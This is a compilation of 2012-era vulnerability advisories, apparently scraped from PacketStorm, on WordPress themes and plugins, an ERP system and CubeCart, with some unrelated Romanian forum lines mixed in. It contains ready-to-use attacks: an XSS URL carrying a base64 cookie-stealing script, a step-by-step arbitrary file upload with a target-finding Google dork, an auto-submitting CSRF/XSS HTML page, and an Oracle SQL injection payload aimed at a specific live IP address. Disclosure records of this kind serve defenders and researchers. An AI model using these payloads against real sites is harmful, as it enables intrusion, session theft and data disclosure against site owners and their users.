Source: PacketStorm
-
33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities. Hello list! Earlier I've wrote to the list about multiple vulnerabilities in multiple themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In that later I've mentioned 16 themes by RocketTheme (with Rokbox): Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian. I've wrote about 14 themes + 2 variations of 2 themes by these developers, but they have 47 themes for WordPress in total. Among them only three are free, and all other themes from RocketTheme are paid ones (it's needed to buy subscription to the club to receive access to them). And Rokbox is bundled with all these themes, except Grunge, which have all earlier-mentioned vulnerabilities. So I inform you about multiple vulnerabilities in 33 new themes for WordPress, which are developed by RocketTheme (Rokbox's developers). These are Content Spoofing, Cross-Site Scripting, Full path disclosure and Information Leakage vulnerabilities. ------------------------- Affected products: ------------------------- In these 32 themes (in addition to previous 16) there are Cross-Site Scripting, Content Spoofing, Full path disclosure and Information Leakage vulnerabilities. And Grunge theme has FPD holes. These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere, Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex, Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox, Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline, Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge. Affected all versions of these themes for WordPress. Since August I've informed the developers many times concerning vulnerabilities in Rokbox and their themes with it. ---------- Details: ---------- Content Spoofing (WASC-12): In parameter file there can be set as video, as audio files. Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site. http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv?=1.jpg Content Spoofing (WASC-12): Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml. http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml 1.xml <config> <file>1.flv</file> <image>1.jpg</image> </config> Content Spoofing (WASC-12): http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site XSS (WASC-08): http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Full path disclosure (WASC-13): In all these themes there is FPD in index.php (http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for other themes), which works at default PHP settings. Also potentially there are FPD in other php-files of these themes. Information Leakage (WASC-13): In some themes, similar to rt_mixxmag_wp, there can be error log with full paths. http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source: PacketStorm
-
WordPress SB Uploader version 3.9 suffers from an arbitrary file upload vulnerability. # Exploit Title: WordPress SB Uploader 3.9 Arbitrary File Upload Vulnerability # Exploit Author: Evil aXe # http://www.facebook.com/iChocolate.lips # Date: 30/12/12 # Greetz: R3x0Man, Shadman tanjim, Shahee Mirza, JingoBD, ManInDark And All Crew and Members of Bangladesh Cyber Army. # Software Link: http://wordpress.org/extend/plugins/sb-uploader/ # Version: 3.9 # Category: webapps # Tested on: [Windows 7] # Google Dork : "inurl:plugins/sb-uploader" ===================== Vulnerability : Arbitrary File Upload Vulnerability ===================== Exploit Details : ===================== 1. Register 2. Login [Confirm your email then login] 3. Add a New post 4. Write title,body something what you want 5. Look at the Right slidbar " SB Uploader" panel and upload your file 6. Publish the post 7. You file is uploaded here : /wp/wp-content/uploads/2012/02/yourfile[.]ext ===================== p0c: localhost/wp/wp-content/uploads/2012/12/cOol.htm ===================== ♥ BCA ♥ Source: PacketStorm
-
WordPress Photo Plus / Photo Search version 4.8.11 suffers from cross site request forgery and cross site scripting vulnerabilities. # Exploit Title: Word Press Photo Plus, Photo Search XSS/CSRF Vulnerability # Google Dork: # Date: 29/12/12 # Exploit Author: k3170makan # Vendor Homepage: http://wordpress.org/extend/plugins/wp-photo-album-plus/ # Software Link: http://wordpress.org/extend/plugins/wp-photo-album-plus/ # Version: 4.8.11 # Tested on: Ubuntu 10.04 Word Press Photo Plus plugin suffers from a XSS/CSRF via Vulnerability in the "Search Photos" function Code: extract from wp-photo-album-plus.php, in widget function -------------------------------------------------------------------------------------------------------------------------------- 42 <form id="wppa_searchform" action="<?php echo($pagelink) ?>" method="post" class="widget_search"> 43 <div> 44 <?php echo $instance['label'] ?> 45 <input type="text" name="wppa-searchstring" id="wppa_s" value="<?php echo $wppa[ 'searchstring'] ?>" /> 46 <input id = "wppa_searchsubmit" type="submit" value="<?php _e('Search', 'wppa'); ?>" /> 47 </div> --------------------------------------------------------------------------------------------------------------------------------- The above code fails to sanitize the $wppa['searchstring'] variable, allowing attacks to inject harmfull HTML elements and JavaScript code. Submissions to this form can also be made from any domain, which actually aids in the exploitation of the vulnerability thus this is classified as a CSRF Vulnerability Exploit Code: The exploit requires an attacker to forge a post request to this form, this can be done by using the following html page -------------------------------------------------------------------------------------------------------------------------------- 1 <html> 2 <body onload="xss()"> 3 <form name="f" id="wppa_searchform" action="http://[domain name]/[photo search page path]" method="post" class="widget_search"> 4 <input type="text" name="wppa-searchstring" id="wppa_s" value='"><script>alert(1);</script><textarea>'> 5 <input name="s" id="wppa_searchsubmit" type="submit" value="Search"> 6 </form> 7 <script> 8 function xss(){ 9 document.f.s.click(); 10 } 11 </script> 12 <body> 13 <html> -------------------------------------------------------------------------------------------------------------------------------- [photo search page path] can be obtained by reading the path set in the original photo search form attributes -- <Keith k3170makan <http://about.me/k3170makan> Makan/> Source: PacketStorm
-
The ERP (Enterprise Resource Planning) system from Sida University System suffers from a remote SQL injection vulnerability. # Exploit Author: Shahram Darvishvand [karaji_kt21]  <darvishvand.shahram[at]gmail[dot]com>  # Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ]  # Vendor : sida university system  # Date: [4/May/2012]  # Google Dork:   "نرم اÙزار جامع erp شامل قوانین Ú©Ù¾ÛŒ رایت Ù…ÛŒ باشد Ùˆ نوع نسخه بتا Ù…ÛŒ باشد"  # Version: [ 1389/09/17 ]  # Tested on: [ASHX .. Application powered by Oracle DBMS] ============================================================ ** This Vulnerability Is On version 1389/09/17 ** -------------------------------------------- Exploit :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title= ============================================================= Example :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title= 'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- Response : Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit ========================================================== [+] Greetz : Fahime.Saveh , Behrooz_Ice ******************************** For Screen shot 1 : http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- For Screen Shot 2 : http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- Source: PacketStorm
-
Ala sunt eu ma nu e tinkode. Ce moloz nu ati inteles?!
-
-
Nu facem bani pe net
-
Ai PM.
-
CubeCart versions 5.0.7 and below suffer from an insecure backup file handling vulnerability. 1. OVERVIEW CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup File Handling which leads to the disclosure of the application configuration file. 2. BACKGROUND CubeCart is an "out of the box" ecommerce shopping cart software solution which has been written to run on servers that have PHP & MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs up the configuration file, "global.inc.php", upon new installation or upgrade process. The name of backup configuration file is set to the year, month, day, hour, minute that the process is performed. The non-randomized nature of this backup scheme allows an attacker to retrieve the file through brute-force method. 4. VERSIONS AFFECTED 5.0.7 and lower versions 5. Affected Files /setup/setup.install.php /setup/setup.upgrade.php ///////////CODE ////////////// ##Backup existing config file, if it exists if (file_exists($global_file)) { rename($global_file, $global_file.'-'.date('Ymdgi')); } ///////////////////////// e.g. http://127.0.0.1/cube507/includes/global.inc.php-2012021245719 \ 6. SOLUTION Upgrade to the latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-24: Vulnerability reported 2012-12-28: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup CubeCart Home Page: http://cubecart.com/ #yehg [2012-12-28] --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd Source: YGN Ethical Hacker Group :: Security Research
